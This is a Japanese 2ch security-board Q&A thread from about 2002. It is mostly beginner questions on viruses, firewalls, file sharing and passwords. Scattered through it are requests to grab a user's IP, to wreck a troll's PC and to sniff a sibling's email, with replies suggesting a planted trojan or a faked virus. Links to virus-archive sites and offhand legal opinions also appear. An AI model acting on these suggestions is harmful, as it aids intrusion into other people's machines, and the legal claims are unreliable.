http://pc.2ch.net/test/read.cgi/sec/1005443942/l50

>>363はウィルスなのでリンク踏まないように！
アンチウィルスソフトの最新定義ファイルでも検出されないみたいな事が他のスレにありました。
悪戯もの？とにかく踏まない方がベターです。

・・・・・・・・・・・・・・・・・・・・・・・
Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 211.15.148.0-211.15.153.0
b. [ネットワーク名] TRY-NET
f. [組織名] トライネットワークインターナショナル株式会社
g. [Organization] TRY NETWORK INTERNATIONAL Co.,LTD
m. [運用責任者] KM2222JP
n. [技術連絡担当者] SO1523JP
p. [ネームサーバ] ns1.freecom.ne.jp
y. [通知アドレス] [email protected]
y. [通知アドレス] [email protected]
[割当年月日] 2000/05/29
[返却年月日]
[最終更新] 2001/03/02 13:32:20 (JST)
[email protected]
・・・・・・・・・・・・・・・・・・・・

＞３８２さん
助かりました、なんとか消えてくれた模様。
どうも、ありがとうございました。

>>386
楽しいか？
オナニーは一人でやるもんだぜ

IP厨のみならず、ドメインサーチ厨も減らないんだな・・・

WinXPにしたらBlackICE 2.5Jが使えなくなりました。
代わりになるお勧めのソフトを教えてください。

>>381
俺もだよ　どうすりゃ　いいの？
まじでこえーよ

>>385
もうちょっと勉強してから解答する側にまわった方が良いかもしれんな。
質問者や閲覧者が混乱するだけだ。

＞ じゃぁ、一般ユーザーは閉じても大丈夫？普段の利用に特に問題おきませんか？
＞ 閉じ方教えて頂けませんか？便乗すいません。
webサーバ等を立てていないなら80ポートを開く必要は無いし、開いていない。
開いているなら何らかのソフトが開けているのだからそれを外せば良い。

ちなみに>>363はウイルスではないし（単なるジョークソフト）とっくに他のスレで解決している。


>>391
http://pc.2ch.net/test/read.cgi/hack/1011083919/

>>371
まだ、IEでgifアニメ見える設定にしてる?
逝ってよしだな。

WinXPにしたらBlackICE 2.5Jが使えなくなりました。
代わりになるお勧めのソフトを教えてください。

初歩の初歩ですみません
えっと。。ネットしてて他人のPCの中身(HDDのCやD)が
見えてしまうなんてことがあると聞きました。
なんでも、共有してるとかで。。
では、自分がPCの中身を見られているとして
その共有なんとかをさせない為には
自分のPCの「何を」設定し直せば良いのでしょうか?
よろしくお願い致します

>>394
このスレが参考になるかも。
http://pc.2ch.net/test/read.cgi/sec/988724444/

>>395
ファイルの共有は本来LANでファイルをやりとりするための
もので、通常ならインターネット接続しようとする際などに
外には出ていかない設定に変更してくれるんだけどね。

自分で設定したい場合、OSによるんだけどなあ。
WIN98とかMEだと、
コントロールパネルのネットワークで、
「ファイルとプリンタの共有」から。
個別のドライブ、フォルダ、ファイルについては
マイコンピュータやエクスプローラなりで
右クリック（またはメニューバーのファイル）から
プロパティを出して、「共有」タブで設定。
（コンパネのネットワークで共有しない設定になってると
このタブはない）
まあ、LANといえども、C:とかを共有にするのは
あんまり感心したことではないわなあ。

>>395
ファイル共有の設定を切れ
プロバイダがYahooBBならサイトにやり方が載っている

>>396
>>397
ありがとうございます
OSは98seです。NTTベースのADSLでして
モデムはusb接続のやつです。
この板に来て、あれこれ見ているうちに
怖くなりまして(泣)
>コントロールパネルのネットワークで、
>「ファイルとプリンタの共有」から。
ありましたありました(汗)
ネットワークを開くとファイルとプリンタの共有があり
クリックするとチェックが外れてました(安堵)
それからZoneAlarmと言うのを入れてみます。
本当にありがとうございましたm(__)m

経験、知識ともに豊富な皆さん、
お勧めのウィルスソフトを教えていただけないでしょうか。
お願いします。ちなみに自分はウィルススキャンを使っているのですが、
最近調子が悪いため違うソフトに変えようと思ったため相談にきました。
よろしくお願いします。

あぼーん

しょうもないサイトを宣伝しに来るな厨房

http://vx.netlux.org/dat/vct.shtml
ウイルス２５０種
http://www.ebcvg.com/binary.php
Empire248はBloodhoundFileString
http://www.symantec.com/region/jp/sarcj/data/b/bloodhound.html
http://www.symantec.com/avcenter/reference/heuristc.pdf

ハッキングのわざが手に取るようにわかる本
プチワラドットコム (著)
http://www.amazon.co.jp/exec/obidos/ASIN/4798002194/ref=lm_lb_1/249-0653458-6978756

はじめての3分ハッキング
KAZU (著)
http://www.amazon.co.jp/exec/obidos/tg/detail/customer-reviews/-/books/491554057X/ref=lm_lb_2/249-0653458-6978756

なんでレヴューがこんなに差があるの？
レヴュー投稿日を見てみると、プチワラ側の謀略にしか思えん。
内容的にはどうなんでしょ。

Ｙａｈｏｏ掲示板でＩＰ抜く方法を教えてあげてください。

対象者はコイツ↓
http://messages.yahoo.co.jp/bbs?.mm=SP&action=m&board=
1834707&tid=a5a2a5sa5a5pbfmbgbd89ga1aaa1aaa1aa&sid=1834707&mid=4005


なんでも「絶対出来る」そうです。
ボクには絶対出来ません（ｗ

ﾘｱﾙﾊｶｰ、スキルの高い方、ご協力お願いします。

>>403
これは謀略でしょ。というかレビューなんか当てにならんね。
12月移行のレビュー投稿は全部一人のヤツじゃないか？

-----
「ハッキング本ってみんな書いてあることがムズイけど、
　こりゃサルでも無視でもハッキングを理解して読めるわ♪
　イラストもバカでいい。情報量+質、共にバッチグー♪ 」
-----
　　　　↑
こんなバカ丸出しのレビューはマトモじゃ書けないよ。

>>404
やだ

>>404
それ「ケンカして負けたらお兄ちゃんを呼ぶ」のと同じ。
無駄なこと考えず自分の身の丈でケンカしなさい。

>>404
自分で立てた糞スレをなんとかしろ！あふぉ！

メルコの
BLR-TX4というルーターを使っているのですが、
MSNメッセでファイルの転送が出来ません。どうすれば出来るようになりますか？

>>409
http://www.airstation.com/menu/tech/soft/info.html

参照スレ
http://pc.2ch.net/test/read.cgi/hard/999453253/

>>404
いやぁ派手にやりあってますなあ。まずは>>403の二冊から
読み始めてみましょう。がんばってやっつけてね。

サーバー

マジの質問です。ポートが見えないって意味の「ステルス」のつづりを
教えてもらえませんか？。

辞書くらいもってねーのかよ。
stealth

Re: 1月 21日 40k
[email protected]... Delivery Status Notification
tomofumi takeuchi Re: 1月 21日 40k
hirokazu yonemori

414さん、ありがとー！！！だって最初が「ｓ」なのか「ｔｈ」なのかすら
わかんなかったんですもん。だから調べにくかったんです…。サンクス！。

HAMSTER.DOC.pif このハァイルは

ハァイルは？

>>417
多分Badtrans.Bです。
でも、ハファイルを添付して送信するのはコレまでに報告されてません。
亜種です！！！

すいませーん、ちょっと気になるもんで教えてください。

パソコンを使用中、なーんもしてないのに
いきなり「バチン！」と音を立てて勝手に再起動しました。
不安になったのでウイルスバスターでチェックしても
なんにもひっかかりません。
ファイアウォールのログを見てもそれらしき形跡は残ってません。

これってウイルスとかトロイとかじゃないっスよね…多分。

攻殻機動隊２

http://vx.netlux.org/dat/vct.shtml
ウイルス２５０種
http://www.ebcvg.com/binary.php
Empire248はBloodhoundFileString（右端の上から６番目）
http://www.symantec.com/region/jp/sarcj/data/b/bloodhound.html
http://www.symantec.com/avcenter/reference/heuristc.pdf

>>420
電源内の埃が原因で静電気が飛んで一瞬電圧低下し再起動

か、どうかはわからない。

　　

>>424
サンクスです。
いろいろ調べたけど、多分それっぽいみたいです。

ありがとうございました。

ちょっと質問〜
Iexploreが原因でKERNEL32.DLLにエラーが発生しました。
って出るときの原因を詳しく教えてほしいのです・・・・。
ちなみにＹｈｏｏＢＢだったり・・・・
やたら出るんですが？？

>>426
リソース不足が原因だろ
IEは特に関係無し

>>426
それはあまりにも原因がありすぎて特定できないですね〜。
特定のソフトが干渉したりすることもありますし…。
…でもって、板違いですよたぶん。

>>425
よくそのレスで解決できたな(ﾜﾗ

>427 428
サンクス〜〜♪
即レス感謝〜

>>426

IE だぁ？ KERNEL32 だぁ？
そんなもんはなぁ…　アレだ（藁

ちょっと疲れるから、そんなゴミは、やめてよ

Aさんが、いわゆるDynamicDNS と fletsISDN を利用して
メールサーバを運用しているとします。
Aさんのドメイン名は hogehoge.com であるとします。

AさんがグローバルIP xxx.xxx.xxx.xx1 を割り振られているときに
フレッツの切断、再接続によってグローバルIP が xxx.xxx.xxx.xx2 に
変更されたとして、DynamicDNS への登録IP を変更するまでの間に、
xxx.xxx.xxx.xx1 が別の人、Bさんに割り振られたとします。

このとき、たまたまBさんもメールサーバを立てていたとして、
だれかが [email protected] へのメールを出すと、
メールは Bさんのマシンに届いてしまうことになるのでしょうか？

下のＨＰで匿名串を利用して会議ＢＢＳに書き込もうとするとはじかれてしまいます。
出来るだけ匿名じゃないっぽい串（co.jpで終わったりとか）を使っても、
はじかれてしまうんですがどうにか潜り込む事はできませぬか？

http://r1.ugfree.to/~kupo68/

>>432
WEBサーバだけにしとけ。 つーかMXまで設定してくれるところあんのか?

>>433
正々堂々と生で書けばいいじゃん

>>435

それいっちゃあお終いよw
でもそれもいイかも〜（藁

>>432 のような事故は起こりうるという解釈でよいのか？
つまり、DynamicDNSを使うような環境ではメールサーバは
立ち上げるべきではない、ということだな？

>>437
そのような事故もおこるし、未接続の時に出されたメールは全部エラーになる。

>>437
http://pc.2ch.net/test/read.cgi/network/984537367/

210.85.251.56　catv taiwan

ＡＤＳＬの設定でインターネットができなくなりました。

たくさん？のなかの一つなのですが

１）システムのプロパティーのＩ／０の範囲で
０００にするとデバイスと競合します

ってなるのですが
０００何個かでるのですが　この時　どれを選んだらいいのですか？

私のパソコンはフロッピーディスクがついていなくて
ＣＤーＲＷにコピーしてインストールするしかないのですが

ＮＩＫＥＰＡＮＡ　ｓｍｉｃ　
か
ＣＤ−ＲＯＭ　ＤＲＩＶＥ
を選択するところもあるのですが
どうしたらいいでしょうか

２）ネットワークコンポーネットの選択では
ＮＥＴ　ＢＥＵＩか　ＴＣＰ？ＩＰのどちらを選択するのですか？

ＷＩＮ　ｍｅ
ＬａｎｅｅｄーＣＤＬ／ＴＸ

つたない文章ですが教えてください。
よろしくおねがいします。

それ、セキュリティの話しか？＞441

http://www.jade.co.jp/

９５にはプリインストールされていたが。

だれかノスタルジースレ立ててくれ！

エコロジー　エコロジー　エコロジー　エコロジー　エコロジー　エコロジー　
エコロジー　エコロジー　エコロジー　エコロジー　エコロジー　エコロジー

なんか、ウイルスにかかってしまいました。
症状は、「勝手に身の覚えのない画像がたまに表示される」です。
どうやって直せばよいのですか？お願いです。教えてください！

>444
それはウィルスチェックした上で書いているんだろうな？

2ちゃんねるで過去に使ったハンドルネームが、
他人にわかっているみたいなんですけど、
こんな危険なことが、誰でもできちゃうんですか？

>>446
ハンドルネームの何が危険なんですか？

>>447
執拗に狙われたりするとか。

SVCHOST.EXEってなんでしょうか？

>>447
ハンドル騙られて、傍若無人/非人道的な書き込みをされ、、、、そして
良識派の住人から蔑まれ、、、
最終的には、社会から抹殺される可能性が有ります。

>>449
どうぞ
http://www.google.com/

http://money.2ch.net/test/read.cgi/build/1011774209/23 が言ってる
掲示板一覧ってどこから入るの?

>>452
http://www6.ocn.ne.jp/~mirv/bbstable.html　か？

ウィルスにかかった？みたいなんですが、スキャンしてもHITしません
WinMEです
1、昨日いきなりPCが立ち上がらなくなった
２、起動した時のチャ〜チャチャ〜の音の後止まる（たまになってたので再起動すれば直ると思った
３、何度やっても止まる、セーフモードでは立ち上がる。昨日色々やったが駄目だった
４、今朝駄目だろうと思いつつ立ち上げたら起動した（理由分からず

こっから重要で、NETがほぼ出来ない
というのは、何かをDLしようとしてもすぐ切られてしまう、ULも同じ
スピードテストも出来ない、HPをみようとしてもHPまでたどり着けない
繋いだ一瞬は速度出るが、すぐ切れてしまう＞こういうカキコならその一瞬で書き込める

NET接続を妨害するというウィルスをご存知の方いるでしょうか？
検索も出来ないため掲示板くらいにしか頼れるところがないです

>454
ウィルスと言うよりも、ただ単にパソコンの調子が悪いだけのような。
OS の再インストールとかしてみましたか？
ウィルスの定義ファイルなどは最新のモノですよね？

PCは少し程度できるが、専門用語や突っ込んだ事は分からないです
NET以外には特に支障は今のところ無いようです
ノートンでスキャンしてるんですが、どうにも・・・
ウィルス定義すら落とせないありさまなので

再インストはまだしてませんです
一応最終手段にして、とりあえず何とかならないか探ってるところです
朝起動した時はうれしくて、まさかこんな所でかかってくるとは思わなかった・・・
かなり色んなデータ残ってるんで、データとって再インストすることは出来るんですが
できればこのままがいいんで
何か他に書いたほうがいい情報ってありますか？

ネット以外にも、起動の時にもトラブルがあるんでしょ？
ウィルス定義ファイルが、よほど古いモノでも無いならば、
ウィルスよりも、コンピュータ不調を疑うべき。
スキャンディスクしてみて、問題が解決しなかったら、
OS の再インストールを勧めてみます

スキャンディスクとシステムの復元も駄目でした
やっぱりOS再インストしかないですかね・・・・・・
起動してデータ焼けるだけでも良しとするべきか
お騒がせしました、ありがとうございました

システムファイルチェッカーで調べてみたか？
レジストリ狂ってないか？

>>459
ちょっと待って！
スキャンディスクがダメとは、スキャンディスクが失敗したのか、スキャンディスクを行っても回復しなかったのか、どっちなの？

AVGをＤＬするときStreet Address Line 1
と書いてある行があるのですが、
赤いので必ず入れなければならないんですよね？
だとしたらあそこには何を入れるんですか？
http://www.grisoft.com/html/us_dwnl3.php

>>462
不明な単語・語句があるならば辞書を引くべきです。
僅かな労力を惜しんではいけません。

それから、んなもんは、適当に入れときゃー通ります。

>>459
もう寝ちゃった？

つまらない質問なんですけど。
WINS鯖へのクライアントの登録情報を見たいんですけど、要領がわかりません。
誰か教えてください。

IPのわかってる荒らしのパソコンをメタクソに破壊したいんですが
良い方法無いですかね・・・・。
あーあ、削除人がちっとも規制してくれなくてもう我慢の限界だよぅ・・・。

ＰＣの中にいままで自分が使ったパスワードのログ一覧みたいなものは
ないのでしょうか？
パスワードを忘れてしまい、使えないのがあります。
ログ一覧があれば、それを見たら思い出せるかなぁと思い・・・
ご存知の方がいらっしゃいましたら教えていただけないでしょうか。
よろしくおねがいいたします。

Windows9x/Me のログオンパスワードを忘れてしまいました。Windows 起動時に、Windows ログオンの画面で入力すべきパスワードを忘れてしまった場合、次の作業でリセットすることができます。
ただし、Windows に覚えさせていたダイヤルアップパスワードなども削除されてしまうので、ご注意ください。
PC を起動し、Windows ログオンの画面で ESC キーを押します。
[スタート]−[検索]−[ファイルやフォルダ] をクリックします。
名前に英数半角で *.pwl と入力して、「検索開始」ボタンをクリックします。
見つかったファイルを全て削除します。
[スタート]−[Windows の終了] から Windows を再起動します。
ログオン画面でお好きなユーザー名と、設定したいパスワードを入力してログオンします。
(ここで、パスワードに何も入れないと、次回から自動ログオンができます。)


9x系だったらこれでできるのでは

（出典）ttp://homepage2.nifty.com/winfaq/wme/　

PWLクラッカも有るらしいけどね。
w2kにしてから知ったから試した事無いけど（ｗ

>>467
レスありがとうございます。
「*.pwl 」で検索しましたら「Vaio,pwl」「既定.pwl」「Defaul.pwl」
の３個しか出てきませんでした。
忘れたパスとはｳｪﾌﾞﾒｰﾙのパスなのです･･･ＩＤはわかるのですが、
パスワードもリマインダの答えもわからなくなってしまいました・・・
初心者でもわかるパスの解読方法はないのでしょうか。
ご存知の方がいらっしゃいましたら教えていただけないでしょうか。
よろしくおねがいいたします。

>>469
そのWebメールの管理人に聞くしかないな
教えてくれるとは限らないけど

そもそも初心者上級者問わずパスワードが解読できたら意味ないだろ？
今頃世の中は大混乱だぞ！

>>496
>ＩＤはわかるのですが
どうしてもというならｱﾚ系使うしかないな。。。

>ご存知の方が
ファイル名と置いてあるサイト忘れたからだめですすみません。

ウィルスについてちょっと聞きたいのですが、
アドレスのどこかに“_”が入って送られてくる奴は
なんて名前だったかご存知でしょうか？

そんな御無体な…。

>>472
トレンドマイクロで検索してみろ。

>>472
W32.Badtrans.B@mm

トロイはアンチソフトで検出できるでしょうが、ハッキングされてることは
どうやってしらべればいいんですか？

なんか最近質問の内容がありきたりだな…。
そもそも、その「ハッキング」とは何なのだ？

>>476
おまえのPCをハッキングしても何の特もないから心配するな

>>460-461
まだ再インストはやってないです。
色々焼く準備とか焼いたりとか
>>461
スキャンディスクをやっても回復しなかった、です
>>460
システムファイルチェッカーとは？アクセサリとノートンには見当たらない・・・

また夕方に帰ってきます

さっきセブンイレブン善●寺店の前の自販機で
リポビタンD買ったんです。
で、取り出し口に手ぇつっこんでみたら
３本もあったんです。リポDが。

コレって飲んでも大丈夫？
俺のセキュリティ意識は
ギャンギャン警報鳴らしてるんですけど。

>>480
１０年程前に薬品入りのジュースが流行ったね

ネタにマジレス

>>480
ためしに3本全部飲んでみて、胃袋がギャンギャン逝ったら
検証されました・・・ご愁傷様です。

>>480
http://www.alpha-net.ne.jp/users2/knight9/seisan.htm

　　　

長文申し訳ない。（コピペではない）
とりあえず、誰かに話して気持ちをすっきりさせたいんです。（涙
---
自宅では、YBB!を使っていますが、ご存じの通りYbb!はモデムがルータータイプではなくブリッジタイプです。
それをいいことに、馬鹿Hubを使い複数台のマシンを繋いで、それぞれグローバルアドレスを取得しています。
で、それはいいのですが、ある時、自宅LANの手入れをしようと、Winに簡易DHCPを入れ、ローカルマシンにIPの自動取得ができるように設定しました。
勿論、その時はモデムをはずし、他に問題が起きないようにしていました。
その後メンテを終えた後は、DCHPを終了させ普通に使っていましたが、先日、再びDHCPを起動させるとそこには見知らぬマシン名がずらずらと。
そうです、簡易DHCPを切ったつもりでしたが、実はバックグラウンドで動く仕様になっていたのです。
そのため、192.168.0.3から始まるIPのリースが、38まで…
ごめんなさい、36名の方々。
---
こうした場合って、やっぱりローカルIP振られてしまった人って接続できなくなるんですかねぇ？

>>485
そんなこたあねえだろ
接続できてるから３６名が見えたんだから

>486　ん？でも、うちのDHCPでプライベート振られてGatewayとかどうなっちゃうのよ？
正直言って、どういう症状がでるか全く想像つかん。

「Yahoo BB の設定に注意(重大なセキュリティリスク)」ってスレがあったのね。
ttp://pc.2ch.net/test/read.cgi/sec/1005443942/

スレ違い申し訳ない。

質問があります。最近、セキュリティ板において、
糞スレ立てるわ、板違いだわ、レベルの低下が
激しいのですが、これは、どうしてでしょうか？
また、どのような対処方法がありますか？

>>489
厨房いっぱいだから
対処法は無視すること

>>489
良スレを持ち上げて押し流せ

質問させてください。
ノートン先生のログで、sunrpc(111)を毎日何回か叩かれている形跡があるのですが、大丈夫なのでしょうか。

>>492
「ノートン」がそれに反応するという事は大丈夫です。

家でルータとハブとPC３台でLANを組んでいます。
ねーちゃんのメールを盗み見ようと思い、
network sniffer Vigilを使おうとしたのですけど、
キャプチャー開始を実行しても、
アダプタ選択の画面が表示されるだけで、
ねーちゃんのパケットを受信することが出来ていないようです。

何が間違っているのかどなたか教えてください。

メルトモに自分のアドレスを掲示板みたいなところに載せられて
メールが沢山きて困ってます・・・。
メアド変える以外に方法あります？訴えとか・・・。

　

どうしよう。ＰＣ壊れてバックアップもとれずに初期化。
サイト鯖のパスワード紛失しました。
でも、鯖はパス再発行しないそうな。。。
鬱だ。

http://www.hackerslab.org/jorg/

生IPで見知らぬエロサイトの会員になるのはやっぱり危険ですか？
一応無料っぽいんですけど

ていうか生IPでどこまで情報が漏れるんでしょうか？
ホスト名（使っているプロバイダ）
あとブラウザ・OS情報ぐらいですよね

ときどき２ｃｈで晒されてるのもホストの情報までだし
（会社でサーバ立ち上げてたら話は別だろうけど）
会社学校って言ってもサーバ立ち上げてなくてISP接続だったら
自宅といっしょってことだろうし

串もわけのわからないまま使うのも怖いし
串やってるとこ自体が危険だったら最悪だし
安全な串って見分けられるところってあるのかなー

だれかわかりやすく教えてー！！

500

適度に寒い名スレ

>>494
ねーちゃんのパソコンにトロイ仕込め

>>497
パスワード類はPCに残さず紙などに書いてオフラインで保存。これ常識。

>>499
＞あとブラウザ・OS情報ぐらいですよね
それIPと関係ないって。ちなみにJSならディスプレイの解像度と色数も分かるぞ。
無料のエロ会員サイトなんて無い。絶対金取られるぞ。
無料ならいくらでもあるから探せ。

>>502さん、レスどうもです
はう、やっぱり危険そうですね…やめておこう（ｗ

解像度と色数までわかる場合もあるんですかーすごい…
ブラウザ・OS情報はIPとは関係ないのですね
それでは、IPでわかるのはホスト情報までで、
ユーザ名まではわからないってことですね

ありがとうございましたｍ(＿ ＿)ｍ

>>503
「Verisignの認証を受けているので安全です」なんてのを信じて、「はい」を選択すると、
>>503がPCに、かつて入力した情報、これから入力する情報、全て持っていかれる。

すいません　質問です
ウィンドウズのウインドウの右上の「閉じる」「最大化」などと
「戻る」「進む」などのスターテスバーの選択する右側の三角ボタン、
スクロールバーの上下を選択する三角印が数字やローマ字になります
あと、選択する時にできるチェックする場所が変な絵の表示になります・・・
以前、知らない人から添付ファイル付きのメールをもらってご操作の後
開いてしまったことがあります
なのでウィルスかと思っていますが
どの種類のウィルスか断定できません・・・
わかるかたいましたら返答願います
お願い致します

>>505
ウィルスではありません

フォントやアイコン、最大化／最小化ボタンがおかしくなりました
http://homepage2.nifty.com/winfaq/wme/trouble.html#74

ｳｨﾝﾄﾞｳｽﾞから、SSH使いたいんですけど、
ｔｔｓｓｈに、ttsecure.exeがないんですけど・・・

NIS使ってるのですがポートが閉じません、どうしたらいいのでしょうか？

あなたの使用しているＰＣからウィルスが送信されていることが確認された。

ほかに被害を広げないために直ちにウィルス駆除処理をとること。

【ウィルスの紹介】
http://www.trendmicro.co.jp/virusinfo/default3.asp?VName=WORM%5FBADTRANS%2EB
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.badtrans.b%40mm.html

【直ちにとるべき対策】
１：ハードディスクをフォーマットしてＯＳを完全クリーンインストールし直す
　　このとき、PCに残っているデータはフロッピーやCD-R・MOなど使って
　　PCに読み込める形ではいっさい残してはいけない。
２：すべてのフロッピーディスク・MO・CD-RWを物理フォーマットし直し、
　　CD-Rはすべて破壊処分すること
３：メールソフトをMicrosoft OutlookやOutlook Expressからほかのものに
　　切り替えること
参考：http://www.forest.impress.co.jp/mail.html
http://www.vector.co.jp/vpack/filearea/win/net/mail/index.html
　　なお、シェアウェアを導入した場合は必ず即時に送金すること。
４：ウィルス対策ソフト正規版を導入し、パターンファイルを毎日更新すること
　　（※体験版は不可。また、必要ライセンス分購入すること。）
５：PCから入力しているプロバイダやネットワークのパスワードをすべて変更すること
６：クレジットカードの契約をすべて破棄し退会すること

この上のことがわからなければ今使っているPCを捨てて、PCにいっさい触れないこと。

以上、直ちに対策をとること。
なお、当然のことながらこの対策にかかる費用や損害については
すべてあなたが負担すること。




こんなメールがきたんだけどどうすればいいのォォ〜(T_T)
＞もうウイルスは駆除しました

http://oss.jodi.org/
これ踏んでからページ開くたびに小さいウインドウが出てきて、
いちいち毎回最大化しなきゃいけなくなったんですけど、
どうやったら元に戻せるんですか？
初心者なもんでさっぱりわからないんです。
誰か教えてもらえませんか？

>>510
http://homepage2.nifty.com/winfaq/c/ietips.html#274

>>511
ありがとうございます。
試してみたんですが直りません…

>>512
どーでもいいけど、使ってるブラウザの名前くらい書いたら？
ネスケなら>>511と同じ方法で直った。

>>513
他のスレで聞いて解決しました。
すいません。ありがとうございました！

>>514
首吊れ。

>>509
とりあえず無視しときなさい。
どうせ定型文で送信してるだけだから。

ここでCドライブの内容が見られているのですが、これはなんですか？

ttp://www.security-check2.ch.vu/

>>517
正常です

向こうには内容は漏れてないと言うこと？

>>516ｻﾝ
その送り主のサイトアドレスがあったのですが
「ウイルス感染者＝管理能力のない大馬鹿物」とかいって
人のアドレスを勝手に晒されていました。。。

＞感染したマシンの持ち主はセキュリティ意識のない大馬鹿者と断罪します。

だった。

>>519
そうです
不安を煽ってセキュリティソフトを買えということらしい

>>520
ははは
そいつ（送り主）はウィルスメールが届くたびに親切にそのメールを送っているようだ

>>520
あんたもサイト立ち上げて、ウィルスメールが届くたびに、
こんなメールを送って人のアドレスを晒しているヤツ…のアドレスを
晒してやれ！

>>522ｻｿ 523ｻｿ　ありがとう

どうやらヤツはアニヲタなちょっとイタタな人間っぽいです。
もしかしたらウイルスにトラウマでもあるのかも知れません。
もし対処されないようなら
ネトヲチ板で逆に晒してやろうかなｗ

>>524
つーか、おまえはウイルスに感染しちゃって、メアドを漏らした上に
あまつさえそいつにメールで警告されるまで気が付かなかったのでは？
それともどっちに責があるかも判らないドアフォですか？
判らないなら首吊ってください。

>かなりハゲしく同意。

>525
いえ感染後に即ウイルス駆除しました。
駆除後にそのメールがきたようです。

-------------
勝手に人のアドレスにウィルスを送らないでください。
一応証拠を最後に付けときます。

今回は晒しはとめますがまた同じウィルス送ったときは晒すので、
二度と感染しないようにセキュリティをアップしておくこと。

このセキュリティホールは２００１年９月にはわかっていたものです。
それさえわかっていれば感染などしなかったはずです。

企業だと「危機管理０」と言われて取引停止・倒産といわれても仕方ないことです。

以降、セキュリティに気をつけること。

-----------
というメールが再びきました。

>>527
単なる逆恨み？
教えてくれただけ、相手が親切だったと感謝するべきだと思うけど。

>>527
だから何？むかつくメールで深く傷ついたんでちゅか？

>528
だから
その人に警告される前にウイルスに気付いて駆除しましたが…

>>530
あなたが何に対して腹を立てているのか、サッパリわからないんですけど。
「駆除後にいちいち警告するな、面倒な奴め」という事ですね。

>531
ちゃんと読んでよ…
その人のサイトにわたしのメアドが晒されていたんだよ…>>520

>>532
あ、他のレスと見まちがえてました。
酔って絡んでごめんね。

>>533
いえ、大丈夫です

>532
晒されたのはお前がウイルスメルを送ったからだろ？
（ってかワームだと思うが）
それは仕方ないだろ。お前が悪い。晒されても文句言えないと
思われ。感染に気づいて駆除できても既にメルは飛んでんだから
迷惑をかけるのは気づく早さにかかわらず同じ。
感染そのものを防ぐ事が出来なかったお前のせい。
ちゃんと返事までしてくれて逆にいい奴だと思うが？

>535
いや故意に送ったわけじゃないんだよ。
てゆうかその人のこと全く知らないのに…

全く知らないメアドの人に
ウイルスが届いてしまうってことあるんですか？
防ぎようがないじゃないですか…(T_T)

>>535
>ちゃんと返事までしてくれて…

そう、しかもわざわざアンダーバーを削除してまでね…笑

例のヒカルが気になってトレンドのオンラインスキャンして
みたのですが、使用ＯＳがＭＥなのに枠に書かれている
「−トロイの木馬の検索について　Windows 95/98/Meをお使いの場合、
ウイルス検索を開始しますと、MS-DOSプロンプトの画面（右画像参照）が
起動します」
のように、MS-DOSプロンプトの画面が出ないのですが、
既にトロイに「発見させないよ〜」ってな感じで検知できないように
何かされているのでしょうか？

そいつの言うとおり今後気をつければ
よし。誰でもｼﾊﾟｰｲはある。被害がそんだけで
済んだと思えばそっちの方がラッキーだろ。

>>532
おまえが悪い。
ウイルスの危険とメアド晒す危険とどちらが大きいか判らないでしょ？
きっとおまえが知らない所にもウイルスは大量に送られてる筈だ。
警告される前に駆除すれば全く無責任で済むと思ってるの？アフォでしょ？

>540
＞警告される前に駆除すれば全く無責任で済むと思ってるの？
思ってないよ。

>>535
漏れなら、一度ウイルス罹った奴のメアドは、敢えて晒さないけど。。
つか、その晒した奴って････ウイルスの事大して知らないね。似たような
もんだよ>509と（ﾌﾟｯ

>>356
最低限のセキュリティ情報は見ろ。
ネットにおいて、セキュリティの無知無関心は故意と同じだよ。
判らないのならネットに繋ぐな。ヴォケが。
ネットは誰でも金を払えば無責任に使えるものじゃないんだよ。

誤爆
>>536
最低限のセキュリティ情報は見ろ。
ネットにおいて、セキュリティの無知無関心は故意と同じだよ。
判らないのならネットに繋ぐな。ヴォケが。
ネットは誰でも金を払えば無責任に使えるものじゃないんだよ。

>>509さん
ウチにもバドトランスメールは１日２通程度来るけど、
99％は知らない人のアドレスですよ。

理解できたか？＞５０９
そういうこった。

>>509さん
正直、晒されてるのがいやなら…
「晒すのをやめてもらえませんか？」と正式に依頼してみたら？
その対応によっては別の話になると思う。

うーん…
相手先にメールをしたところ
プロバに証拠をつきつけてあんたを追放することもできる。
とか言われました。
もう諦めます。回線で首吊れりゃ済む話だ。
あぼーん

>544 545
っていうかあんたらも結構親切だよな・・・・
なんだかんだいいながら・・・。

>>547
ぽじてぃぶ(・∀・)ｲｲ!ウイルスにレスするマメな奴だから詫び入れれば反応するかもね。

>プロバに証拠をつきつけてあんたを追放することもできる。
出来ないし、晒すことでそれを強要したりするのは逆に犯罪だし。。

>>548
あら。無駄だったのねｗ
悪は滅びた。

＞心配すんな。いくらなんでもそこまで
話は発展しねぇだろ。セキュリティーってのは
確かにちゃんとしてない方が悪いがそれ（ワームなりなんなり）を
喰らった方にも全く責任がないわけじゃないしな。
追放まではいかねぇだろ。ちゃんと
「今度から気をつけます。ごめんちゃい」って謝れ。
相手も人間だ。それで終いだろ。

>>549
暇なだけ。

>>548
ウィルスでっち上げて仕返ししろ。(藁

>>542 のいうように、その晒してるヤツも知識中途半端だと思う。

>554
んじゃ俺と理由が同じじゃん。（ｗ

故意かどうかは関係なくウイルス送信したことは素直に謝罪すべき
誠心誠意わびても相手が晒すのをやめなかったり、脅迫するようなら
これはまた別の手段を選ぶべき…そのときはここの板じゃないだろけど。

どーせ>>509の事だから高飛車な態度で
「メアドを晒すのはやめなさい」とか言ったのだろう。無視できないなら詫び入れろ。それがいやなら告訴しろ。
告訴が面倒なら自分の悪辣と共にそいつの事をどこかで晒せばよかろう。
結局、損するのはお前だけだが。

>>548
その晒してる奴の行為はリンチにあたるので許されるべきじゃないね。
警察に「http://xxxx/で名誉毀損を受けている」と被害届出すべし。

　　　　　　　／￣￣￣￣￣＼
　　　　　　　|　　おまえらも　|
　 ∩_∩　　|　　　　　　　　　　|
　（´ー`）　<　　暇な奴ら　　　|
　（　　　）　 |　　　　　　　　　　|
　 |　|　|　　 |　　だなぁ　　　　|
　（___）__）　 ＼＿＿＿＿＿／

>>560
正直誉められた行為ではないが、名誉毀損にはあたらないと思う。
事実あったことを書いてるわけだから。

>>560
不正アクセス禁止法ではPCの保守義務があるはずだが？
ウイルスの侵入を許す状態を放置する事自体が違法(過失)だから
訴訟になれば圧倒的に不利だな。

メアド晒されたぐらいで訴訟おこさないでっ！ぷんすか！

>>561
だから暇だって言ってんだろ

>>562
1 公然と… 満たす
2 事実を適示し… 満たす
3 名誉を毀損する… 満たす
あたるよ。

>>563
追加。不正アクセス行為の禁止等に関する法律
http://law.e-gov.go.jp/htmldata/H11/H11HO128.html
これの5条。
